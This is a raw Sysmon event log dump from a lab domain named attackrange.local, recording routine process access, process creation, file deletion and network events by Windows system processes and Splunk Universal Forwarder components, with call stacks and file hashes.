07:42:50.190{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045606Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.190{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F27A-60EB-DD7C-00000000CF01}4848C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045605Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.190{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F27A-60EB-DD7C-00000000CF01}4848C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045604Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.141{466BC892-F27A-60EB-DD7C-00000000CF01}4848C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045603Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.137{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=114CA18162E242302EF105ABA432E760,SHA256=17A47E3C5C3C2BE0B0CF408F73AAE41BCD67FBBE75117E67FCCE2099D8DD8770,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805840Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:50.079{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60A14AE06FE510F71A7E76AB69B6B915,SHA256=22744DFCEF2080D9A4DB011BAC9D1EB0FEB3481927E43F5D025BDC941A56FB72,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045632Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:51.768{466BC892-F27B-60EB-DF7C-00000000CF01}77168544C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045631Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:51.553{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F27B-60EB-DF7C-00000000CF01}7716C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045630Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:51.537{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045629Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:42:51.537{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045628Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:51.537{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045627Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:42:51.537{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045626Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:51.537{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F27B-60EB-DF7C-00000000CF01}7716C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045625Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:51.537{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F27B-60EB-DF7C-00000000CF01}7716C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045624Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:51.538{466BC892-F27B-60EB-DF7C-00000000CF01}7716C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045623Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:51.153{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=977931B5A92BB01976C2CC8EFE93C2EE,SHA256=9A52C812D24742DADCB6D21BA6488BAB138D8AEB0E70E8DFC5D0F91EEB153F67,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001045622Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:51.153{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C0651B0CB496569EC5EA27EA4A2E579C,SHA256=8280063A02D54619C51F0B1EA4B4FF356E88D6AD8BD2C6A9DBD4705A0CD1025F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805842Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:50.259{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57137-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000805841Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:51.095{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EF7BD62D7ACBE256EC5C08433133368,SHA256=45287B1C91E2DD0C62312F2D34E0719DCFD36B6A313117551258A45DE50AB196,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045650Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.921{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F27C-60EB-E17C-00000000CF01}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001045649Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.921{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045648Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.921{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045647Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:42:52.921{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045646Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.921{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045645Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.921{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F27C-60EB-E17C-00000000CF01}6404C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045644Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.921{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F27C-60EB-E17C-00000000CF01}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045643Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.906{466BC892-F27C-60EB-E17C-00000000CF01}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045642Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.552{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BDF0035593C4116EF545E5A66FEA5ECB,SHA256=20B5B49367EAFBF998F94FD23A77125A6CFDE150C2DC4FB9328F54821676D972,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045641Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.221{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F27C-60EB-E07C-00000000CF01}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045640Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:42:52.221{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045639Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.221{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045638Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
